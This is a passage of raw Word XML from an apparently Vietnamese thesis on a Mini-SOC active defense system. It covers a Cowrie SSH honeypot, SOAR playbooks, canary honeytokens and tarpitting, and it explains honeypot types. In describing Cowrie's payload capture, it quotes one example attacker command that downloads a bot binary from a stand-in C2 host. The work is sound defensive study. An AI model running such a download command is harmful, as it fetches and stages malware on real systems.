          <w:p w14:paraId="2D82575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Thời gian Phản ứng (MTTR)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7C5C580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Phụ thuộc 100% vào người đọc tin nhắn (15 - 30 phút).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7DA9594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Tự động hóa hoàn toàn bằng SOAR Playbooks (1.8 - 2.5 giây).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7EE2FEEF"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655B1201"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1.5 Mục tiêu nghiên cứu và Các đóng góp khoa học - kỹ thuật của Đề tài</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CEA1E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Mục tiêu tổng quát của đồ án là nghiên cứu, thiết kế kiến trúc và hiện thực hóa thành công một Hệ thống Phòng thủ Chủ động (Active Defense Framework) quy mô Mini-SOC, tích hợp chặt chẽ giữa Cowrie SSH Honeypot với Nền tảng Tự động hóa Phản ứng Sự cố </w:t>
      </w:r>
      <w:r w:rsidRPr="005B486F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>(SOAR) và Trinh sát ngược Kẻ tấn công nhằm bảo vệ hạ tầng máy chủ Linux trước các chiến dịch tấn công dò quét tự động.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2515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đạt được mục tiêu tổng quát trên, đồ án tập trung vào các mục tiêu cụ thể và đạt được các đóng góp kỹ thuật then chốt sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBE294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Về mặt Lý thuyết &amp; Khung phương pháp luận: Phân định ranh giới pháp lý và kỹ thuật giữa 'Hack-back phá hoại bất hợp pháp' và 'Phòng thủ chủ động hợp pháp (Active Defense)' dựa trên khung chiến lược chuẩn quốc tế MITRE D3FEND và MITRE Engage. Xây dựng mô hình chuỗi phản đòn bằng Deception và De-anonymization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56434E6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Về mặt Thiết kế Kiến trúc Hệ thống: Thiết kế kiến trúc phân lớp Mini-SOC linh hoạt, module hóa cao độ, đảm bảo khả năng mở rộng (Scalability) và dễ dàng tích hợp thêm các cảm biến honeypot khác trong tương lai.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F24BBA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Về mặt Xây dựng Động cơ Tương quan (Correlation Engine): Tự phát triển thuật toán trượt cửa sổ thời gian (Sliding Time Window) để phát hiện tấn công dò quét mật khẩu (T1110.001), phân biệt giữa các đợt quét tự động vô hại và các cuộc xâm nhập có chủ đích, loại bỏ triệt để hiện tượng Alert Fatigue.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F410DB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Về mặt Trinh sát ngược &amp; Tình báo đe dọa (Threat Intel Engine): Tích hợp tự động đa nguồn dữ liệu mở (Multi-source OSINT) bao gồm AbuseIPDB, Shodan API, GeoIP ASN và cơ chế quét cổng an toàn (Safe Port Probing) nhằm lập hồ sơ kẻ tấn công (Attacker Profiling) ngay trong mili-giây đầu tiên của sự cố.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB87AC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Về mặt Đánh lừa &amp; Bẫy mồi Khử ẩn danh (Active Honeytokens): Xây dựng cơ chế sinh tự động các file tài liệu mồi nhử (Fake AWS Keys, Fake Bash History, Fake Database Dumps) có nhúng Canary Webhook Beacons. Khi hacker đánh cắp tài liệu và mở trên máy thật, hệ thống sẽ bắt được IP thật và dấu vân tay trình duyệt của hacker, giải quyết triệt để bài toán hacker ẩn danh qua Proxy/Tor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194BE96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6. Về mặt Tự động hóa Phản ứng &amp; Tiêu hao đối phương (SOAR Enforcer &amp; Tarpitting): Triển khai thành công kỹ thuật giam lỏng Tarpit (Endless Socket Hold) làm tiêu hao tài nguyên CPU/RAM/Bandwidth của các máy chủ tấn công, kết hợp với cơ chế cập nhật tự động Tường lửa iptables/nftables và đồng bộ Threat Feed IOCs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104619F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7. Về mặt Tác chiến &amp; Điều hành: Xây dựng Telegram SOAR Bot tương tác 2 chiều (Bidirectional Interactive Bot) trang bị bàn phím điều khiển tức thời (Inline Keyboard </w:t>
      </w:r>
      <w:r w:rsidRPr="005B486F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Actions), cho phép chuyên viên SOC ra quyết định tác chiến ngay trên thiết bị di động trong vài giây.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5E004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1.6 Đối tượng, Phạm vi và Giới hạn nghiên cứu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3C7EF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Đối tượng nghiên cứu: Các hành vi, kỹ thuật và phương thức tấn công nhắm vào dịch vụ truy cập từ xa SSH/Telnet; Công nghệ bẫy Medium-Interaction Honeypot (Cowrie); Kỹ thuật phân tích log và tương quan sự kiện theo chuẩn MITRE ATT&amp;CK; Kỹ thuật phòng thủ chủ động bằng Honeytoken và Tarpitting; Nền tảng điều phối phản ứng sự cố tự động SOAR.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DF191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Phạm vi triển khai: Hệ thống được xây dựng và triển khai trên nền tảng hệ điều hành máy chủ Linux (Ubuntu Server 22.04 LTS / Debian 12), hỗ trợ môi trường ảo hóa Docker Container và tương thích kiểm thử trên máy trạm Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD2D8C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Giới hạn nghiên cứu: Đồ án tập trung vào phân tích và phản ứng các cuộc tấn công nhắm vào giao thức SSH và Telnet. Các cuộc tấn công ứng dụng Web (HTTP/HTTPS) hoặc dịch vụ cơ sở dữ liệu phân tán không nằm trong phạm vi cảm biến chính của đề tài (mặc dù kiến trúc SOAR được thiết kế sẵn sàng để mở rộng nhận log từ các cảm biến khác).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD33E6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1.7 Bố cục toàn văn của Đồ án</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0EF0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Nội dung báo cáo đồ án được kết cấu thành 6 chương chính cùng các phần phụ lục và danh mục tài liệu tham khảo chi tiết:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B32353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1: Tổng quan và Đặt vấn đề - Phân tích bối cảnh, thực trạng tấn công SSH, hạn chế của phòng thủ thụ động, phân tích nhận xét của giảng viên và xác định mục tiêu nghiên cứu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002F777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2: Cơ sở Lý thuyết và Khung Công nghệ - Trình bày nền tảng lý thuyết về Honeypot, kiến trúc Cowrie, khung pháp lý/kỹ thuật của Active Defense, công nghệ Honeytoken khử ẩn danh, khung tự động hóa SOAR, kỹ thuật Tarpit và ma trận MITRE ATT&amp;CK.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3805C70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3: Thiết kế Kiến trúc Hệ thống Mini-SOC Active Defense - Trình bày thiết kế chi tiết 5 phân lớp của hệ thống, luồng dữ liệu, lưu đồ thuật toán tương quan sự kiện và thiết kế các playbook phản ứng sự cố.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B1FC8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Chương 4: Hiện thực hóa và Mã nguồn các Phân hệ - Chi tiết hóa quá trình cài đặt môi trường, tùy biến Honeypot chuyên sâu và phân tích mã nguồn chi tiết các module Python tự phát triển.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57311E0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5: Thử nghiệm Thực tế, Đánh giá và Phân tích Tấn công - Trình bày kết quả kiểm nghiệm trên 4 kịch bản tấn công Red Team giả lập, phân tích hiệu năng giảm thiểu MTTR, đánh giá hiệu quả bóp nghẽn của Tarpit và thống kê dữ liệu tấn công thực tế từ Internet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125AF19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6: Kết luận và Hướng phát triển - Tổng kết các đóng góp đạt được, chỉ ra những hạn chế và đề xuất định hướng phát triển nâng cao trong tương lai.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F28339"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03A0EDFD"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2: CƠ SỞ LÝ THUYẾT VÀ KHUNG CÔNG NGHỆ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD6B2F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2.1 Bản chất và Phân loại Công nghệ Bẫy Honeypot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9B8B9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Thuật ngữ Honeypot (Bình mật) được giới thiệu lần đầu tiên trong lĩnh vực an toàn thông tin bởi Clifford Stoll trong cuốn tiểu thuyết kinh điển 'The Cuckoo's Egg' (1989) và sau đó được Lance Spitzner chính thức định nghĩa một cách khoa học: 'Honeypot là một tài nguyên an ninh thông tin mà giá trị cốt lõi của nó nằm ở chỗ nó bị thăm dò, bị tấn công hoặc bị xâm phạm trái phép'. Bản chất của Honeypot là một hệ thống không phục vụ bất kỳ mục đích sản xuất hay kinh doanh hợp pháp nào. Do đó, bất kỳ nỗ lực kết nối, rà quét hay tương tác nào hướng tới Honeypot đều được coi là hành vi bất thường hoặc có ý đồ xấu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C46D0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Dựa trên mức độ tương tác (Level of Interaction) cho phép kẻ tấn công thực hiện, công nghệ Honeypot được phân chia thành ba nhóm chính:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BEBA4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1. Honeypot tương tác thấp (Low-Interaction Honeypots): Hệ thống chỉ mô phỏng các tầng giao thức mạng cơ bản (chẳng hạn như bắt tay TCP SYN-ACK hoặc trả lời các banner dịch vụ tĩnh). Hệ thống không có hệ điều hành thật hay shell dòng lệnh nào được thực thi. Điển hình cho dòng này là Honeyd. Ưu điểm là tiêu tốn cực ít tài nguyên phần cứng, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B486F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>an</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B486F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> toàn tuyệt đối vì hacker không thể lợi dụng để phá hoại, nhưng nhược điểm là không thu thập được kịch bản tấn công phức tạp và rất dễ bị các công cụ quét chuyên nghiệp phát hiện (Fingerprinted).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FD376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Honeypot tương tác trung bình (Medium-Interaction Honeypots): Hệ thống mô phỏng một môi trường ứng dụng và hệ thống tệp tin giả lập đầy đủ hơn. Hệ thống có khả năng tương tác với kẻ tấn công thông qua các phiên bản giả lập của shell (như bash), cung cấp khả năng bắt giữ các tệp tin tải lên (payload downloading) và mô phỏng thành công các lỗ hổng dịch vụ phổ biến mà không cần chạy một hệ điều hành thực tế bên dưới. Cowrie và Dionaea là hai đại diện tiêu biểu nhất. Đây là giải pháp cân bằng hoàn hảo giữa độ an toàn và độ phong phú của dữ liệu thu thập được.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B43E6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Honeypot tương tác cao (High-Interaction Honeypots): Hệ thống sử dụng máy ảo (Virtual Machine) hoặc máy chủ vật lý thực sự chạy hệ điều hành hoàn chỉnh (Real OS) và các dịch vụ thực tế để kẻ tấn công xâm nhập. Mọi hành vi của hacker đều được giám sát chặt chẽ từ bên ngoài thông qua hypervisor hoặc kernel hook. Nhược điểm lớn nhất là rủi ro an ninh rất cao: nếu cấu hình cô lập mạng không cẩn thận, kẻ tấn công có thể biến máy bẫy thành bàn đạp tấn công ngược lại toàn bộ hệ thống nội bộ của doanh nghiệp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FC1102"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lastRenderedPageBreak/>
        <w:t>Bảng 2.1: Ma trận so sánh các dòng Honeypot mã nguồn mở phổ biến trên thế giới</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a4"/>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3505C753" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3F25756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Dòng Honeypot</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1B16F8F8"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Mức độ Tương tác</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5B5A0D2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Dịch vụ Mô phỏng Chính</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="28B82AF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Ưu điểm Vượt trội</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3C55721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Hạn chế Chính</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="0F1486B9" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="39BC8A2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Dionaea</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="110BD8B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Medium-Interaction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0E85142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SMB, HTTP, FTP, TFTP, MSSQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2263272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Chuyên bắt giữ sâu mạng (Worms) và mã độc tự lây qua SMB.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="50E2278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hỗ trợ tương tác dòng lệnh SSH chuyên sâu.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="1D24DAD7" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="21811EA8"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7181D66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Medium-Interaction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1D0A9F7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SSH, Telnet, SFTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3B9513E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Giả lập shell Linux chân thực, ghi log TTY chi tiết, lưu giữ mã độc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6129D6D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Cần tinh chỉnh để tránh bị hacker phát hiện chữ ký mặc định.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="0CBAB410" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="29EC3BE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Conpot</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="66C3DA6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Low-Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="029F4D9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ICS/SCADA, Modbus, S7Comm, BACnet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="347019A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Thu thập thông tin tấn công vào hạ tầng điều khiển công nghiệp.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4B9420C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Chỉ phù hợp với hệ thống công nghiệp đặc thù.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="46F72DCC" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="719A72A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Glastopf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4D2D23E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Low-Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="57C7D18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Web Application, HTTP, Vulnerability emu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="27BD014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Bắt các đợt quét lỗ hổng SQL Injection, LFI/RFI trên web.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="18E5E7B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Đã ngừng phát triển tích cực, được thay thế bởi Snare/Tanner.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="50D431FE" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="13A4CE8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Honeyd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="34945F6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Low-Interaction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3B1C88A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TCP/IP Stack, IP Daemons</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="50B4064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Mô phỏng hàng ngàn máy chủ ảo trên một địa chỉ IP duy nhất.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="25628D5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hỗ trợ tương tác ứng dụng thực tế.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="778EC7BE"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3B91C87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70C9A172" wp14:editId="02439146">
            <wp:extent cx="5486400" cy="3092335"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17015869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486400" cy="3092335"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C58F5E"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2.1: Mô hình phân loại Honeypot theo mức độ tương tác (Low, Medium, High)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501A042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2.2 Kiến trúc và Cơ chế hoạt động của Cowrie SSH/Telnet Honeypot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111F3C4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Cowrie là một hệ thống Medium-to-High Interaction Honeypot chuyên biệt cho việc giám sát giao thức SSH và Telnet, được phát triển dựa trên nền tảng framework Twisted của ngôn ngữ Python. Cowrie vốn được fork và nâng cấp toàn diện từ dự án Kippo nổi tiếng, bổ </w:t>
      </w:r>
      <w:r w:rsidRPr="005B486F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>sung thêm hàng loạt tính năng hiện đại như hỗ trợ giao thức Telnet, giả lập SFTP, xuất log JSON thời gian thực và kiến trúc Proxy chuyển tiếp linh hoạt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7658CC1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Cơ chế hoạt động bên trong của Cowrie bao gồm các thành phần cốt lõi sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479A1C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Twisted Event-Driven Engine: Toàn bộ quá trình bắt tay SSH, trao đổi khóa mã hóa (Key Exchange), thương lượng thuật toán mã hóa đối xứng (Cipher Negotiation) và xác thực người dùng đều được xử lý bất đồng bộ bởi Twisted. Điều này cho phép Cowrie có thể duy trì hàng ngàn kết nối đồng thời từ các botnet mà không làm sụp đổ bộ nhớ hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3F1AC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2. Hệ thống Tệp tin Giả lập (Virtual Filesystem - </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B486F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>fs.pickle</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B486F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>): Thay vì để kẻ tấn công can thiệp vào ổ cứng thật của máy chủ, Cowrie sử dụng một tệp tin serialized (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B486F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>fs.pickle</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B486F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>) đại diện cho cây thư mục hệ điều hành Linux Debian tiêu chuẩn (bao gồm /bin, /etc, /var, /root, /home). Khi hacker thực hiện các lệnh duyệt thư mục như ls, cd, cat, Cowrie sẽ đọc thông tin từ cấu trúc ảo này. Bất kỳ thao tác xóa file hay thay đổi quyền hạn đều chỉ tồn tại tạm thời trong bộ nhớ của phiên làm việc đó, hoàn toàn không ảnh hưởng đến hệ thống máy chủ vật lý.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F38CA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Shell Emulation Engine: Cowrie tích hợp một bộ xử lý lệnh mô phỏng cho hơn 50 lệnh Linux phổ biến nhất (cat, whoami, uname, ifconfig, ps, kill, wget, curl, crontab). Khi kẻ tấn công nhập lệnh, Cowrie sẽ phân tích cú pháp (parse arguments) và trả về kết quả giả lập giống hệt như trên máy chủ thật.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B67B16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Malware Staging &amp; Payload Capture: Đây là tính năng đắt giá nhất của Cowrie. Khi kẻ tấn công thực thi lệnh tải mã độc từ xa (ví dụ: 'wget http://malicious-c2.org/arm7 -O bot.sh'), Cowrie không dùng tiến trình wget thật mà tự động sử dụng thư viện HTTP client nội bộ để âm thầm tải file nhị phân đó về thư mục cách ly 'var/lib/cowrie/downloads', tính toán mã băm SHA256 và lưu lại dấu vết phiên làm việc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540E2C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TTY Recording &amp; Structured JSON Logging: Mọi thao tác gõ phím của kẻ tấn công đều được ghi lại dưới định dạng TTY log (cho phép xem lại như một đoạn video tua lại bằng lệnh 'bin/playlog') và toàn bộ metadata sự kiện được xuất ra tệp tin cấu trúc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thời gian thực.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBC5147"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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="7528CB78" wp14:editId="3912BEC5">
